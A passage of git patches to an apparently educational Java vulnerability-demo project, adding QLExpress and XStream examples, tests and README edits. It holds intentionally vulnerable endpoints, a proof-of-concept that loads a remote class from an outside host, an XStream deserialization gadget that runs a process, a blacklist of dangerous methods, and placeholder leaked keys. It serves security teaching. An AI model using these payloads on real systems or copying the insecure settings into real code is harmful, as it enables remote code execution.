     /**
      * 不能使用白名单的情况下建议使用该方案。前提是禁用重定向并且TTL默认不为0。
-     *
      * 存在问题：
      *  1、TTL为0会被绕过
      *  2、使用重定向可绕过
diff --git a/src/main/java/org/joychou/util/CookieUtils.java b/src/main/java/org/joychou/util/CookieUtils.java
index eddae0db..f63b6e42 100644
--- a/src/main/java/org/joychou/util/CookieUtils.java
+++ b/src/main/java/org/joychou/util/CookieUtils.java
@@ -21,4 +21,17 @@ public static boolean deleteCookie(HttpServletResponse res, String cookieName) {
             return false;
         }
     }
+
+    public static boolean addCookie(HttpServletResponse res, String cookieName, String cookieValue) {
+        try {
+            Cookie cookie = new Cookie(cookieName, cookieValue);
+            cookie.setMaxAge(1000);
+            cookie.setPath("/");
+            res.addCookie(cookie);
+            return true;
+        } catch (Exception e) {
+            log.error(e.toString());
+            return false;
+        }
+    }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 66bdb978..15d2c5a3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -46,7 +46,7 @@ swagger.enable = true
 
 
 ### no need to login page begins ###
-joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**
 ### no need to login page ends ###
 
 
@@ -54,5 +54,6 @@ joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**,
 # http header max size
 #server.max-http-header-size=30000
 
+# Fake aksk. Simulate actuator info leak.
 jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
 jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index 1a4c4225..d5c4ccd5 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -28,7 +28,9 @@
     <div class="form">
         <input type="text" placeholder="Username" name="username" required="required"/>
         <input type="password" placeholder="Password" name="password" required="required"/>
-        <p><input type="checkbox" name="remember-me" checked="checked"/>RememberMe</p>
+        <p style="line-height: 1; margin: 0;">
+            <input type="checkbox" name="remember-me" style="vertical-align: top;" checked="checked"/>RememberMe
+        </p>
         <button onclick="login()">Login</button>
     </div>
 </div>

From 457d703e8f89bff657c6c51151ada71ebd09a1c6 Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Thu, 28 Dec 2023 19:38:47 +0800
Subject: [PATCH 18/20] Add qlexpress and some test cases.

---
 README.md                                     |   5 +-
 README_zh.md                                  |   5 +-
 .../org/joychou/controller/QLExpress.java     |  44 ++++++++
 .../org/joychou/controller/XStreamRce.java    |  14 +--
 src/main/java/org/joychou/dao/User.java       |  29 +----
 src/main/resources/application.properties     |   2 +-
 src/main/test/org/test/QLExpressTest.java     | 103 ++++++++++++++++++
 src/main/test/org/test/XStreamTest.java       |  70 ++++++++++++
 8 files changed, 230 insertions(+), 42 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/QLExpress.java
 create mode 100644 src/main/test/org/test/QLExpressTest.java
 create mode 100644 src/main/test/org/test/XStreamTest.java

diff --git a/README.md b/README.md
index e7fbef9e..0e8c074b 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋[Alibaba Security Purple Team Recruitment](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋
 
 ## Introduce
 
@@ -41,6 +41,7 @@ Sort by letter.
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
   - Runtime
   - ProcessBuilder
@@ -146,7 +147,7 @@ Viarus
 Example:
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
 
 return:
diff --git a/README_zh.md b/README_zh.md
index f713e6cc..e2d5727c 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -2,7 +2,7 @@
 
 对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋[阿里集团安全紫军招聘](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
 
 ## 介绍
 
@@ -36,6 +36,7 @@ joychou/joychou123
 - [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
+- [QLExpress](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/QLExpress.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
     - Runtime
     - ProcessBuilder  
@@ -138,7 +139,7 @@ Viarus
 例子：
 
 ```
-http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami
+http://localhost:8080/java-sec-code-1.0.0/rce/runtime/exec?cmd=whoami
 ```
  
 返回：
diff --git a/src/main/java/org/joychou/controller/QLExpress.java b/src/main/java/org/joychou/controller/QLExpress.java
new file mode 100644
index 00000000..663589cd
--- /dev/null
+++ b/src/main/java/org/joychou/controller/QLExpress.java
@@ -0,0 +1,44 @@
+package org.joychou.controller;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.joychou.util.WebUtils;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+
+@RestController(value = "/qlexpress")
+public class QLExpress {
+
+    /**
+     * url = 'http://sb.dog:8888/';
+     * classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);
+     * classLoader.loadClass('Hello').newInstance();
+     */
+    @RequestMapping("/vuln1")
+    public String vuln1(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+
+    @RequestMapping("/sec")
+    public String sec(HttpServletRequest req) throws Exception{
+        String express = WebUtils.getRequestBody(req);
+        System.out.println(express);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        // Can only call java.lang.String#length()
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        DefaultContext<String, Object> context = new DefaultContext<String, Object>();
+        Object r = runner.execute(express, context, null, true, false);
+        System.out.println(r);
+        return r.toString();
+    }
+}
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
index 62616e95..aa3469bd 100644
--- a/src/main/java/org/joychou/controller/XStreamRce.java
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -2,6 +2,7 @@
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
 import org.joychou.dao.User;
 import org.joychou.util.WebUtils;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -24,20 +25,9 @@ public class XStreamRce {
     public String parseXml(HttpServletRequest request) throws Exception {
         String xml = WebUtils.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
+        xstream.addPermission(AnyTypePermission.ANY); // This will cause all XStream versions to be affected.
         xstream.fromXML(xml);
         return "xstream";
     }
 
-    public static void main(String[] args) {
-        User user = new User();
-        user.setId(0);
-        user.setUsername("admin");
-
-        XStream xstream = new XStream(new DomDriver());
-        String xml = xstream.toXML(user); // Serialize
-        System.out.println(xml);
-
-        user = (User) xstream.fromXML(xml); // Deserialize
-        System.out.println(user.getId() + ": " + user.getUsername());
-    }
 }
diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java
index 1336f571..0b8eb3b0 100644
--- a/src/main/java/org/joychou/dao/User.java
+++ b/src/main/java/org/joychou/dao/User.java
@@ -1,32 +1,11 @@
 package org.joychou.dao;
 
-import java.io.Serializable;
+import lombok.Data;
 
-public class User implements Serializable {
-    private static final long serialVersionUID = 1L;
+
+@Data
+public class User {
     private Integer id;
     private String username;
     private String password;
-
-    public Integer getId() {
-        return id;
-    }
-    public void setId(Integer id) {
-        this.id = id;
-    }
-
-    public String getUsername() {
-        return username;
-    }
-    public void setUsername(String username) {
-        this.username = username;
-    }
-
-    public String getPassword() {
-        return password;
-    }
-    public void setPassword(String password) {
-        this.password = password;
-    }
-
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 15d2c5a3..326a2b76 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -46,7 +46,7 @@ swagger.enable = true
 
 
 ### no need to login page begins ###
-joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**, /shiro/**, /ssrf/**, /spel/**, /qlexpress/**
 ### no need to login page ends ###
 
 
diff --git a/src/main/test/org/test/QLExpressTest.java b/src/main/test/org/test/QLExpressTest.java
new file mode 100644
index 00000000..a2071d58
--- /dev/null
+++ b/src/main/test/org/test/QLExpressTest.java
@@ -0,0 +1,103 @@
+package org.test;
+
+import com.ql.util.express.DefaultContext;
+import com.ql.util.express.ExpressRunner;
+import com.ql.util.express.IExpressContext;
+import com.ql.util.express.config.QLExpressRunStrategy;
+import org.junit.Test;
+
+/**
+ * <a href="https://github.com/alibaba/QLExpress">QLExpress</a> security test cases.
+ */
+public class QLExpressTest {
+
+    private static final String poc = "url = 'http://sb.dog:8888/'; classLoader = new java.net.URLClassLoader([new java.net.URL(url)]);classLoader.loadClass('Hello').newInstance();";
+
+    /**
+     * basic usage
+     */
+    @Test
+    public void basicUsage() throws Exception{
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        context.put("a", 1);
+        context.put("b", 2);
+        Object r = runner.execute("a+b", context, null, true, false);
+        System.out.println(r);  // print 3
+    }
+
+    /**
+     * Test case of /qlexpress/vuln1. Use URLClassLoader to load evil class.
+     */
+    @Test
+    public void vuln1() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+    /**
+     * fix method by using class and method whitelist.
+     */
+    @Test
+    public void sec01() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        QLExpressRunStrategy.addSecureMethod(String.class, "length");
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r1 = runner.execute("'abc'.length()", context, null, true, false);
+        System.out.println(r1);
+        Object r2 = runner.execute(poc, context, null, true, false);
+        System.out.println(r2);
+    }
+
+    /**
+     * <p>Fix method by using class and method blacklist. It may exist bypass. </p>
+     *
+     * <p>Default blacklist:
+     *  <ul>
+     *     <li>System.class.getName() + ".exit"</li>
+     *     <li>ProcessBuilder.class.getName() + ".start"</li>
+     *     <li>Method.class.getName() + ".invoke"</li>
+     *     <li>Class.class.getName() + ".forName"</li>
+     *     <li>ClassLoader.class.getName() + ".loadClass"</li>
+     *     <li>ClassLoader.class.getName() + ".findClass"</li>
+     *     <li>ClassLoader.class.getName() + ".defineClass"</li>
+     *     <li>ClassLoader.class.getName() + ".getSystemClassLoader"</li>
+     *     <li>javax.naming.InitialContext.lookup</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setDataSourceName</li>
+     *     <li>com.sun.rowset.JdbcRowSetImpl.setAutoCommit</li>
+     *     <li>QLExpressRunStrategy.class.getName() + ".setForbidInvokeSecurityRiskMethods"</li>
+     *     <li>jdk.jshell.JShell.create</li>
+     *     <li>javax.script.ScriptEngineManager.getEngineByName</li>
+     *     <li>org.springframework.jndi.JndiLocatorDelegate.lookup</li>
+     *  </ul>
+     * </p>
+     */
+    @Test
+    public void sec02() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setForbidInvokeSecurityRiskMethods(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+
+
+    /**
+     * <p>Fix method by using sandbox. </p>
+     */
+    @Test
+    public void sec03() throws Exception {
+        System.out.println(poc);
+        ExpressRunner runner = new ExpressRunner();
+        QLExpressRunStrategy.setSandBoxMode(true);
+        IExpressContext<String, Object> context = new DefaultContext<>();
+        Object r = runner.execute(poc, context, null, true, false);
+        System.out.println(r);
+    }
+}
diff --git a/src/main/test/org/test/XStreamTest.java b/src/main/test/org/test/XStreamTest.java
new file mode 100644
index 00000000..a5375ebf
--- /dev/null
+++ b/src/main/test/org/test/XStreamTest.java
@@ -0,0 +1,70 @@
+package org.test;
+
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.xml.DomDriver;
+import com.thoughtworks.xstream.security.AnyTypePermission;
+import org.joychou.dao.User;
+import org.junit.Test;
+
+public class XStreamTest {
+
+    private static final String poc_xml = "<sorted-set>\n" +
+            "    <string>foo</string>\n" +
+            "    <dynamic-proxy>\n" +
+            "        <interface>java.lang.Comparable</interface>\n" +
+            "        <handler class=\"java.beans.EventHandler\">\n" +
+            "            <target class=\"java.lang.ProcessBuilder\">\n" +
+            "                <command>\n" +
+            "                    <string>Open</string>\n" +
+            "                    <string>-a</string>\n" +
+            "                    <string>Calculator</string>\n" +
+            "                </command>\n" +
+            "            </target>\n" +
+            "            <action>start</action>\n" +
+            "        </handler>\n" +
+            "    </dynamic-proxy>\n" +
+            "</sorted-set>";
+
+
+    /**
+     * XStream basic usage.
+     */
+    @Test
+    public void basicUsage() {
+        User user = new User();
+        user.setId(0);
+        user.setUsername("admin");
+
+        XStream xstream = new XStream(new DomDriver());
+        String xml = xstream.toXML(user); // Serialize
+        System.out.println(xml);
+
+        // High version xstream needs set allowTypes
+        xstream.allowTypes(new Class[]{User.class});
+        user = (User) xstream.fromXML(xml); // Deserialize
+        System.out.println(user.getId() + ": " + user.getUsername());
+    }
+
+    /**
+     * Command execute
+     */
+    @Test
+    public void vuln01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.addPermission(AnyTypePermission.ANY); // Insecure configuration
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+
+    /**
+     * Security code. XStream version: 1.4.20
+     */
+    @Test
+    public void sec01() {
+        System.out.println(poc_xml);
+        XStream xstream = new XStream();
+        xstream.fromXML(poc_xml); // Deserialize
+    }
+
+}

From 1d06b16c2a7acac439783e89e1882f82904edc9d Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Fri, 28 Jun 2024 09:48:48 +0800
Subject: [PATCH 19/20] Add alibaba recruitment.

---
 README.md    | 10 ++--------
 README_zh.md | 13 ++++++-------
 2 files changed, 8 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index 0e8c074b..a6b30f4d 100644
--- a/README.md
+++ b/README.md
@@ -205,12 +205,6 @@ Core developers : [JoyChou](https://github.com/JoyChou93), [liergou9981](https:/
 Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95), [waderwu](https://github.com/waderwu). 
 
 
-## Donate
+## Support
 
-If you like the poject, you can donate to support me. With your support, I will be able to make `Java sec code` better 😎.
-
-### Alipay
-
-Scan the QRcode to support `Java sec code`.
-
-<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">
+If you like the poject, you can star java-sec-code project to support me. With your support, I will be able to make `Java sec code` better 😎.
diff --git a/README_zh.md b/README_zh.md
index e2d5727c..b5c658c3 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -4,6 +4,10 @@
 
 [英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋
 
+## 招聘
+
+[Alibaba招聘-安全攻防/研究（P5-P7）](https://github.com/JoyChou93/java-sec-code/wiki/Alibaba-Purple-Team-Job-Description)
+
 ## 介绍
 
 该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。
@@ -195,12 +199,7 @@ Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会
 
 核心开发者： [JoyChou](https://github.com/JoyChou93).其他开发者：[lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95)。欢迎各位提交PR。
 
-## 捐赠
-
-如果你喜欢这个项目，你可以捐款来支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
-
-### Alipay
+## 支持
 
-扫描支付宝二维码支持`Java sec code`。
+如果你喜欢这个项目，你可以star该项目支持我。 有了你的支持，我将能够更好地制作`Java sec code`项目。
 
-<img title="Alipay QRcode" src="https://aliyun-testaaa.oss-cn-shanghai.aliyuncs.com/alipay_qr.png" width="200">

From 4711f4e186258c6e0dd5c3863e7c9592e7e9026a Mon Sep 17 00:00:00 2001
From: JoyChou <root@joychou.org>
Date: Fri, 28 Jun 2024 09:52:04 +0800
Subject: [PATCH 20/20] Add alibaba recruitment.

---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/README.md b/README.md
index a6b30f4d..c1f2eb91 100644
--- a/README.md
+++ b/README.md
@@ -5,6 +5,11 @@ Java sec code is a very powerful and friendly project for learning Java vulnerab
 
 [中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋
 
+## Recruitment
+
+[Alibaba-Security attack and defense/research（P5-P7）](https://github.com/JoyChou93/java-sec-code/wiki/Alibaba-Purple-Team-Job-Description)
+
+
 ## Introduce
 
 This project can also be called Java vulnerability code.